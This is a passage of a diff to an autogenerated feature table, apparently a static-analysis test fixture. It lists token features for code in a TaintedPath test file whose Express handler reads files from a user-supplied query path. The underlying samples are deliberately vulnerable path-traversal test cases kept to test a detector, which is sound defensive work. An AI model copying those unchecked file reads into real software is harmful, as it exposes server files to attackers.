readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:197:5:197:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:197:8:197:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:197:8:197:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:197:8:197:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:197:8:197:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:197:8:197:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:197:21:197:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:197:21:197:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:197:21:197:24 | path | calleeImports | fs | @@ -8574,6 +74535,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:197:21:197:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:197:21:197:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:197:21:197:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | fs.read ... c(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:199:5:199:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:199:8:199:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:199:8:199:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:199:8:199:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:199:8:199:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:199:8:199:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:199:21:199:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:199:21:199:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:199:21:199:24 | path | calleeImports | fs | @@ -8583,6 +74569,46 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:199:21:199:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:199:21:199:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:199:21:199:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:20 | normalizedPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:20 | normalizedPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:20 | normalizedPath | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:20 | normalizedPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:20 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normali ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normali ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normali ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normali ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normali ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normalizedPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normalizedPath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normalizedPath | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normalizedPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:7:201:49 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:33 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:33 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:33 | pathModule | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:33 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:33 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:43 | pathModule.normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:43 | pathModule.normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:43 | pathModule.normalize | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:43 | pathModule.normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:43 | pathModule.normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:24:201:49 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:201:35:201:43 | normalize | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:201:35:201:43 | normalize | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:201:35:201:43 | normalize | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:201:35:201:43 | normalize | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:201:35:201:43 | normalize | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:201:45:201:48 | path | CalleeFlexibleAccessPath | pathModule.normalize | | autogenerated/TaintedPath/normalizedPaths.js:201:45:201:48 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:201:45:201:48 | path | calleeImports | path | @@ -8592,6 +74618,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:201:45:201:48 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:201:45:201:48 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:201:45:201:48 | path | receiverName | pathModule | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:20 | normalizedPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:20 | normalizedPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:20 | normalizedPath | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:20 | normalizedPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:20 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:31 | normali ... rtsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:31 | normali ... rtsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:31 | normali ... rtsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:31 | normali ... rtsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:31 | normali ... rtsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | exceptional return of normali ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | exceptional return of normali ... r/www') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | exceptional return of normali ... r/www') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | exceptional return of normali ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | exceptional return of normali ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | normali ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | normali ... r/www') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | normali ... r/www') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | normali ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:202:7:202:49 | normali ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:202:22:202:31 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:202:22:202:31 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:202:22:202:31 | startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:202:22:202:31 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:202:22:202:31 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:202:33:202:48 | '/home/user/www' | CalleeFlexibleAccessPath | normalizedPath.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:202:33:202:48 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:202:33:202:48 | '/home/user/www' | calleeImports | path | @@ -8601,6 +74652,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:202:33:202:48 | '/home/user/www' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:202:33:202:48 | '/home/user/www' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:202:33:202:48 | '/home/user/www' | receiverName | normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:203:5:203:35 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:203:8:203:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:203:8:203:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:203:8:203:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule 